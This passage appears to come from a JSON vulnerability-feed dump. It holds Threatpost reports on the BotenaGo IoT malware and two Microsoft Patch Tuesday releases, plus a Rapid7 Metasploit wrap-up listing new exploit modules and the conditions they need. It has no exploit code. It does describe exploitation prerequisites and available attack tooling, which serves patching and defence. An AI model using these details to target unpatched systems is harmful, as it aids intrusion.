Caspi wrote.\n\n\u201cOn port 19412 it will listen to receive the victim IP,\u201d he wrote. \u201cOnce a connection with information to that port is received, it will loop through mapped exploit functions and execute them with the given IP.\u201d\n\nThe second way BotenaGo can receive a target command is by setting a listener to system IO (terminal) user input, getting the command to the device that way, Caspi explained.\n\n\u201cFor example, if the malware is running locally on a virtual machine, a command can be sent through telnet,\u201d he wrote.\n\n## **Dangers to Corporate Network**\n\nGiven its ability to exploit devices connected over internet ports, BotenaGo can be potentially dangerous to corporate networks by gaining access through vulnerable devices, said one security professional.\n\n\u201cBad actors, such as those at work here, love to exploit these devices to gain access to the internal networks behind them, or just to use it as a platform from which to launch other attacks,\u201d observed Erich Kron, security awareness advocate at security firm [KnowBe4](<http://www.knowbe4.com/>), in an email to Threatpost.\n\nAttackers that can be launched once a hacker takes over a device and piggybacks on the network it\u2019s using include [DDoS attacks](<https://threatpost.com/ddos-attacks-records-q3/176082/>), which that can lead to extortion of money from victims, he said. Attackers also can host and spread malware using a victim\u2019s internet connection, Kron observed.\n\nGiven the number of vulnerabilities of which it can take advantage, BotenaGo also shows the importance of keeping IoT and routers updated with the latest firmware and patches to avoid leaving them available to exploit, he added.\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at **_[**becky.bracken@threatpost.com**](<mailto:becky.bracken@threatpost.com>)_**.**_\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T13:14:44", "type": "threatpost", "title": "Millions of Routers, IoT Devices at Risk from BotenaGo Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8958", "CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T13:14:44", "id": "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "href": "https://threatpost.com/routers-iot-open-source-malware/176270/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T21:01:27", "description": "Microsoft has released patches for 128 security vulnerabilities for its April 2022 [monthly scheduled update](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) \u2013 ten of them rated critical (including three wormable code-execution bugs that require no user interaction to exploit).\n\nThere are also two important-rated zero-days that allow privilege escalation, including one listed as under active exploit.\n\nThe bugs in the update are found across the portfolio, including in Microsoft Windows and Windows Components, Microsoft Defender and Defender for Endpoint, Microsoft Dynamics, Microsoft Edge (Chromium-based), Exchange Server, Office and Office Components, SharePoint Server, Windows Hyper-V, DNS Server, Skype for Business, .NET and Visual Studio, Windows App Store and Windows Print Spooler Components.\n\n\u201cThis large volume of patches hasn\u2019t been seen since the fall of 2020. However, this level is similar to what we saw in the first quarter of last year,\u201d Dustin Childs, researcher at Trend Micro\u2019s Zero Day Initiative, said in [a blog](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) breaking down the fixes.\n\n## **Zero-Day Patches**\n\nThe vulnerability that\u2019s been exploited in the wild ahead of patching allows privilege escalation, and is tracked as [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>). It rates 7.8 out of 10 on the CVSS vulnerability-severity scale. It\u2019s listed as a \u201cWindows Common Log File System Driver Execution Vulnerability,\u201d and was reported to Microsoft by the National Security Agency.\n\n\u201cIt\u2019s not stated how widely the exploit is being used in the wild, but it\u2019s likely still targeted at this point and not broadly available,\u201d Childs noted. \u201cGo patch your systems before that situation changes.\u201d\n\nResearchers noted that attackers are likely pairing it with a separate code-execution bug in their campaigns. For that reason, Immersive Labs\u2019 Kevin Breen, director of cyber-threat research, places the actively exploited bug at the top of the priority list for patching.\n\n\u201cBeing the type of vulnerability for escalating privileges, this would indicate a threat actor is currently using it to aid lateral movement to capitalize on a pre-existing foothold,\u201d he explained.\n\nThe second zero-day is found in the Windows User Profile Service, and is tracked as [CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>).\n\nIt also allows privilege escalation, and rates a CVSS score of 7. Even though it\u2019s listed as exploitation more likely, it has a high attack complexity, Microsoft noted in its advisory, because \u201csuccessful exploitation of this vulnerability requires an attacker to win a race condition.\u201d\n\nEven so, researchers at Tripwire noted that exploit code is available for the bug, including in the [Metasploit framework](<https://threatpost.com/metasploit-still-a-menace/149448/>).\n\n## **Critical Concerns for April**\n\nOut of the critical flaws, all of which allow remote code-execution (RCE), researchers flagged a bug that could allow for self-propagating exploits ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>)) as being of the most concern.\n\nIt exists in the Remote Procedure Call (RPC) Runtime Library, and rates 9.8 out of 10 on the CVSS scale, with exploitation noted as more likely. If exploited, a remote attacker could execute code with high privileges.\n\nDanny Kim, principal architect at Virsec, noted that the vulnerability is specifically found in Microsoft\u2019s Server Message Block (SMB) functionality, which is used primarily for file-sharing and inter-process communication, including Remote Procedure Calls. RPC is a communication mechanism that allows for one program to request a service or functionality from another program located on the network (internet and/or intranet). RPCs can be used in technologies like storage replica or managing shared volumes.\n\n\u201cThis vulnerability is another example of an attacker taking advantage of legitimate functionality for malicious gain,\u201d he said via email. \u201cUsing the vulnerability, an attacker can create a specially crafted RPC to execute code on the remote server with the same permissions as the RPC service.\u201d\n\nThe bug could be used to create especially virulent threats, according to Childs.\n\n\u201cSince no user interaction is required, these factors combine to make this wormable, at least between machines where RPC can be reached,\u201d Childs noted.\n\nMicrosoft recommends configuring firewall rules to help prevent this vulnerability from being exploited; the static port used (TCP port 135) can be blocked at the network perimeter.\n\n\u201cStill, this bug could be used for lateral movement by an attacker,\u201d Childs warned. \u201cDefinitely test and deploy this one quickly.\u201d\n\nNext up are [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>)/[24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>), two RCE bugs that affect the Windows Network File System (NFS). Both also have CVSS scores of 9.8, and both are listed as exploitation more likely. They also allow the potential for worming exploits, Childs warned.\n\n\u201cOn systems where the NFS role is enabled, a remote attacker could execute their code on an affected system with high privileges and without user interaction,\u201d Childs explained. \u201cAgain, that adds up to a wormable bug \u2013 at least between NFS servers. Similar to RPC, this is often blocked at the network perimeter.\u201d\n\nImmersive\u2019s Breen added, \u201cThese could be the kind of vulnerabilities which appeal to ransomware operators as they provide the potential to expose critical data. It is also important for security teams to note that NFS Role is not a default configuration for Windows devices.\u201d\n\nThe remaining critical vulnerabilities are as follows:\n\n * [CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>): Microsoft Dynamics 365 (on-premises) (CVSS 8.8)\n * [CVE-2022-22008](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22008>): Windows Hyper-V (CVSS 7.7)\n * [CVE-2022-23257](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23257>): Windows Hyper-V (CVSS 8.6)\n * [CVE-2022-24537](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24537>): Windows Hyper-V (CVSS 7.7)\n * [CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>): Windows LDAP (CVSS 8.1)\n * [CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>): Windows Server (CVSS 8.8)\n * [CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>): Windows SMB (CVSS 8.8)\n\n## **Other Bugs of Note**\n\nAlso worth mentioning: Out of a whopping 18 bugs found in the Windows Domain Name Server (DNS), one ([CVE-2022-26815](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26815>)) allows RCE and is listed as important, with a CVSS score of 7.2.\n\nMicrosoft noted that while attack complexity is low, \u201cthe attacker or targeted user would need specific elevated privileges [for successful exploitation]. As is best practice, regular validation and audits of administrative groups should be conducted.\u201d\n\nMeanwhile, \u201cthere are a couple of important mitigations to point out here,\u201d Childs noted. \u201cThe first is that dynamic updates must be enabled for a server to be affected by this bug. The CVSS also lists some level of privileges to exploit. Still, any chance of an attacker getting RCE on a DNS server is one too many, so get your DNS servers patched.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-12T20:00:54", "type": "threatpost", "title": "Microsoft Zero-Days, Wormable Bugs Spark Concern", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22008", "CVE-2022-23257", "CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24537", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26815", "CVE-2022-26904", "CVE-2022-26919"], "modified": "2022-04-12T20:00:54", "id": "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "href": "https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-12T01:28:08", "description": "Microsoft has addressed a total of 97 security vulnerabilities in its January 2022 Patch Tuesday update \u2013 nine of them rated critical \u2013 including six that are listed as publicly known zero-days.\n\nThe fixes [cover a swath](<https://msrc.microsoft.com/update-guide/>) of the computing giant\u2019s portfolio, including: Microsoft Windows and Windows Components, Microsoft Edge (Chromium-based), Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP).\n\n\u201cThis is an unusually large update for January,\u201d Dustin Childs, a researcher with Trend Micro\u2019s Zero Day Initiative (ZDI), explained. \u201cOver the last few years, the average number of patches released in January is about half this volume. We\u2019ll see if this volume continues throughout the year. It\u2019s certainly a change from the smaller releases that ended 2021 [Microsoft [patched 67 bugs](<https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/>) in December].\u201d\n\n## **Zero-Day Tsunami**\n\nNone of the zero-days are listed as being actively exploited, though two (CVE-2022-21919 and CVE-2022-21836) have public exploit code available. They are:\n\n * [**CVE-2021-22947**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>): HackerOne-assigned CVE in open-source Curl library (RCE)\n * [**CVE-2021-36976**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>): MITRE-assigned CVE in open-source Libarchive (RCE)\n * [**CVE-2022-21874**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>): Local Windows Security Center API (RCE, CVSS score of 7.8)\n * [**CVE-2022-21919**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>): Windows User Profile Service (privilege escalation, CVSS 7.0)\n * [**CVE-2022-21839**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>): Windows Event Tracing Discretionary Access Control List (denial-of-service, CVSS 6.1).\n * [**CVE-2022-21836**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>): Windows Certificate (spoofing, CVSS 7.8).\n\n\u201cThe [cURL bug] was actually disclosed by HackerOne back in September 2021,\u201d Childs said in ZDI\u2019s Patch Tuesday [analysis](<https://www.zerodayinitiative.com/blog/2022/1/11/the-january-2022-security-update-review>). \u201cThis patch includes the latest cURL libraries into Microsoft products. This is why this CVE is listed as publicly known. Similarly, the patch for the Libarchive library was also disclosed in 2021, and the latest version of this library is now being incorporated into Microsoft products.\u201d\n\n## **Patch Immediately: Critical, Wormable Bug**\n\nOut of the critical bugs, a remote code-execution (RCE) issue in the HTTP protocol stack stands out for researchers, given that it\u2019s wormable \u2013 i.e., an exploit could self-propagate through a network with no user interaction. It carries the most severe CVSS vulnerability-severity rating of the entire update, coming in at 9.8 on the 10-point scale.\n\nThe bug **([CVE-2022-21907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907>))** can be exploited by sending specially crafted packets to a system using the HTTP protocol stack (http.sys) to process packets.\n\n\u201cThe CVE targets the HTTP trailer support feature, which allows a sender to include additional fields in a message to supply metadata, by providing a specially-crafted message that can lead to remote code execution,\u201d Danny Kim, principal architect at Virsec, explained via email.\n\n\u201cNo user interaction, no privileges required and an elevated service add up to a wormable bug,\u201d Childs warned. \u201cWhile this is definitely more server-centric, remember that Windows clients can also run http.sys, so all affected versions are affected by this bug. Test and deploy this patch quickly.\u201d\n\nKim noted that CVE-2022-21907 is a particularly dangerous CVE because of its ability to allow for an attack to affect an entire intranet once the attack succeeds.\n\n\u201cThe CVE is the latest example of how software capabilities can be warped and weaponized,\u201d he noted. \u201cAlthough Microsoft has provided an official patch, this CVE is another reminder that software features allow opportunities for attackers to misuse functionalities for malicious acts.\u201d\n\n## **Other Critical Security Holes for January 2022 \u2013 One Unpatched**\n\nAnother interesting critical-rated RCE issue is **[CVE-2022-21840](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21840>)** in Microsoft Office, which, importantly, does not yet have a patch for Office 2019 for Mac and Microsoft Office LTSC for Mac 2021 (CVSS 8.8).\n\n\u201cMost Office-related RCE bugs are important-severity since they require user interaction and often have warning dialogs, too,\u201d said Childs, noting that the Preview Pane is not the attack vector. \u201cInstead, this bug is likely critical due to the lack of warning dialogs when opening a specially crafted file.\u201d\n\nMicrosoft also patched **[CVE-2022-21846](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21846>)** \u2013 a critical RCE bug in Microsoft Exchange Server reported by the National Security Agency, which is listed as \u201cexploitation more likely\u201d (CVSS 9.0). It\u2019s one of three Exchange RCEs being fixed this month (the others are CVE-2022-21969 and CVE-2022-21855), all of which are listed as being \u201cnetwork adjacent,\u201d meaning the attacker would need to be on a target network already to be successful.\n\nDespite the \u201cexploitation more likely\u201d rating, \u201cMicrosoft notes the attack vector is adjacent, meaning exploitation will require more legwork for an attacker, unlike the ProxyLogon and ProxyShell vulnerabilities which were remotely exploitable,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nOne of the zero-days is listed as critical too, it should be noted: **[CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>)**, which is the one found in the open-source cURL library used by Windows to transfer data using various network protocols. It allows RCE leading to man-in-the-middle (MiTM) attacks, according to Automox researcher Maarten Buis.\n\n\u201cAn attacker could carry out a MitM attack by exploiting how cURL handles cached or pipelined responses from IMAP, POP3, SMTP or FTP servers,\u201d he explained in [a Tuesday posting](<https://blog.automox.com/automox-experts-weigh-in-january-patch-tuesday-2022>). \u201cThe attacker would inject the fake response, then pass through the TLS traffic from the legitimate server and trick curl into sending the attackers\u2019 data back to the user as valid and authenticated.\u201d\n\nThe public disclosure significantly increases the chances of exploit, he warned.\n\nAnd, a privilege-escalation issue is unusually flagged as critical: **[CVE-2022-21857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21857>)** in Active Directory Domain Services (CVSS 8.8).\n\n\u201cThis patch fixes a bug that allowed attackers to elevate privileges across an Active Directory trust boundary under certain conditions,\u201d Childs said. \u201cMicrosoft deemed the flaw sufficient enough for a critical rating. This does require some level of privileges, so again, an insider or other attacker with a foothold in a network could use this for lateral movement and maintaining a presence within an enterprise.\u201d\n\nThere\u2019s another critical privilege-escalation issue, **[CVE-2022-21833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21833>)** in the Virtual Machine IDE Drive (CVSS 7.8), but the complexity is marked high. According to Automox, to exploit it, a threat actor would need to gain access to an underprivileged account, such as through an unsecure user password or an account with minimal access controls, to expose this vulnerability.\n\nThus, \u201cseeing this bug in the wild would likely take quite a bit of work,\u201d Childs said.\n\nTwo critical issues in the DirectX Graphics Kernel carry a rating of 7.8 out of 10 on the CVSS vulnerability-severity scale and allow RCE: **[CVE-2022-21912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21912>)** and **[CVE-2022-21898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21898>)**.\n\nTo exploit these, viewing a specially crafted media file could result in code execution, and are likely present in most systems, according to Automox researcher Jay Goodman.\n\n\u201cThe DirectX graphics kernel is a subsystem that enables internal components like graphics cards and drives or external devices like printers and input devices,\u201d he said. \u201cAttackers could use these remote code execution vulnerabilities to deploy and execute code on a target system. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread to other systems. Common and widespread vulnerabilities like these are critical for attackers trying to steal corporate data or infiltrating sensitive systems. It is important for organizations to patch and remediate within the 72 hour window to minimize exposure.\u201d\n\nAnd finally, there\u2019s **[CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>)** in HEVC Video Extensions (RCE, CVSS 7.8).\n\n\u201cSuccessful exploitation would require an attacker to bait an authenticated user into opening a maliciously crafted media file, which would result in remote code execution on the victim\u2019s machine,\u201d explained Automox researcher Justin Knapp. \u201cMicrosoft does not provide mitigation recommendations aside from patching. However, most affected customers will automatically be updated via the Microsoft Store and guidance is provided to check the package version to ensure it has the current update.\u201d\n\nThe monster Patch Tuesday couldn\u2019t come at a worse time, noted Bharat Jogi, director of vulnerability and threat research at Qualys.\n\n\u201cThis massive Patch Tuesday comes during a time of chaos in the security industry whereby professionals are working overtime to remediate Log4Shell \u2013 reportedly the worst vulnerability seen in decades,\u201d he said via email. \u201cUnpredictable events such as Log4Shell add significant stress to the security professionals dealing with such outbreaks.\u201d\n\n**_Password_**_ _**_Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:54:57", "type": "threatpost", "title": "Microsoft Faces Wormable, Critical RCE Bug & 6 Zero-Days", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21855", "CVE-2022-21857", "CVE-2022-21874", "CVE-2022-21898", "CVE-2022-21907", "CVE-2022-21912", "CVE-2022-21917", "CVE-2022-21919", "CVE-2022-21969"], "modified": "2022-01-11T21:54:57", "id": "THREATPOST:05E04E358AB0AB9A5BF524854B34E49D", "href": "https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "rapid7blog": [{"lastseen": "2022-04-09T18:43:30", "description": "## Windows Local Privilege Escalation for standard users\n\n\n\nIn this week\u2019s release, we have an exciting new module that has been added by our very own [Grant Willcox](<https://github.com/gwillcox-r7>) which exploits (CVE-2022-26904)[<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>], and allows for normal users to execute code as `NT AUTHORITY/SYSTEM` on Windows machines from Windows 7 up to and including Windows 11. Currently, the vulnerability is still not patched and there have not been any updates from MSRC regarding this vulnerability, however it may be patched in the next Patch Tuesday.\n\nThis exploit requires more than one local user to be present on the machine and the `PromptOnSecureDesktop` setting to be set to 1, which is the default setting.\n\n## MacOS exploitation\n\nOur very own [space-r7](<https://github.com/space-r7>) has updated the recent `GateKeeper` module to add support for the recent CVE-2022-22616, which can be used to target all MacOS Catalina versions, and MacOS Monterey versions prior to 12.3.\n\nThis module can be used to remove the `com.apple.quarantine` extended attribute on a downloaded/extracted file and allows for code to be executed on the machine.\n\n## Enumerating Chocolatey applications\n\nThis week\u2019s release also features a new module from a first-time contributor [rad10](<https://github.com/rad10>), which will enumerate all applications that have been installed using Chocolatey.\n\nThis could be used when gathering information about a compromised target and potentially vulnerable software present on the machine.\n\n## New module content (5)\n\n * [User Profile Arbitrary Junction Creation Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/16382>) by Grant Willcox and KLINIX5, which exploits [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904?referrer=blog>) \\- This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user's credentials, to execute code as `NT AUTHORITY\\SYSTEM`. The `PromptOnSecureDesktop` setting must also be set to `1` on the affected machine for this exploit to work, which is the default setting.\n * [ALLMediaServer 1.6 SEH Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/16399>) by Hejap Zairy Al-Sharif, which exploits [CVE-2022-28381](<https://attackerkb.com/topics/TSnBdUJwnJ/cve-2022-28381?referrer=blog>) \\- A new module has been added in which exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.\n * [Windows Gather Installed Application Within Chocolatey Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16381>) by Nick Cottrell - This adds a post module that enumerates applications installed with Chocolatey on Windows systems.\n * [#16082](<https://github.com/rapid7/metasploit-framework/pull/16082>) from [usiegl00](<https://github.com/usiegl00>) \\- This updates the `shadow_mitm_dispatcher` module by adding a new RubySMB Dispatcher, whichallows a better integration with RubySMB and enables the use of all the features provided by its client. Both SMBv2 and SMBv3 are now supported.\n * [#16401](<https://github.com/rapid7/metasploit-framework/pull/16401>) from [space-r7](<https://github.com/space-r7>) \\- This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, we've introduced a new CVE option to select which CVE to exploit. This default is the most recent CVE.\n\n## Enhancements and features (4)\n\n * [#15972](<https://github.com/rapid7/metasploit-framework/pull/15972>) from [sempervictus](<https://github.com/sempervictus>) \\- This updates the Log4shell scanner with the `LEAK_PARAMS` option, providing a way to leak more target information such as environment variables.\n * [#16320](<https://github.com/rapid7/metasploit-framework/pull/16320>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Windows Meterpreter payloads to support a new `MeterpreterDebugBuild` datastore option. When set to true the generated payload will have additional logging support which is visible via Window's DbgView program.\n * [#16373](<https://github.com/rapid7/metasploit-framework/pull/16373>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds initial support for Ruby 3.1\n * [#16403](<https://github.com/rapid7/metasploit-framework/pull/16403>) from [sempervictus](<https://github.com/sempervictus>) \\- This adds more checks to the `post/windows/gather/checkvm` module to better detect if the current target is a Qemu / KVM virtual machine.\n\n## Bugs fixed (3)\n\n * [#16398](<https://github.com/rapid7/metasploit-framework/pull/16398>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- A number of recent payload adds did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they will be appropriately tested as part of `rspec` checks.\n * [#16408](<https://github.com/rapid7/metasploit-framework/pull/16408>) from [rtpt-alexanderneumann](<https://github.com/rtpt-alexanderneumann>) \\- This fixes an edge case with the `multi/postgres/postgres_copy_from_program_cmd_exec` module, which crashed when the randomly generated table name started with a number\n * [#16419](<https://github.com/rapid7/metasploit-framework/pull/16419>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- A bug has been fixed whereby when using the `search` command and searching by `disclosure_date`, the help menu would instead appear. This has been remedied by improving the date handling logic for the `search` command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.36...6.1.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-31T11%3A00%3A06-05%3A00..2022-04-07T12%3A52%3A39-04%3A00%22>)\n * [Full diff 6.1.36...6.1.37](<https://github.com/rapid7/metasploit-framework/compare/6.1.36...6.1.37>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T17:50:10", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22616", "CVE-2022-26904", "CVE-2022-28381"], "modified": "2022-04-08T17:50:10", "id": "RAPID7BLOG:FF690F32AA83905D50C2FF923E9DD339", "href": "https://blog.rapid7.com/2022/04/08/metasploit-wrap-up-151/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:49:33", "description": "\n\nHot off the press, it\u2019s another issue of the Patch Tuesday blog! While the number of vulnerabilities is low this month, there are a number of high risk items administrators will want to patch right away including a few that will require additional remediation steps. This Patch Tuesday also includes updates for three vulnerabilities that were publicly disclosed earlier this month. Let\u2019s jump in.\n\n## Windows Elevation of Privilege Vulnerability aka 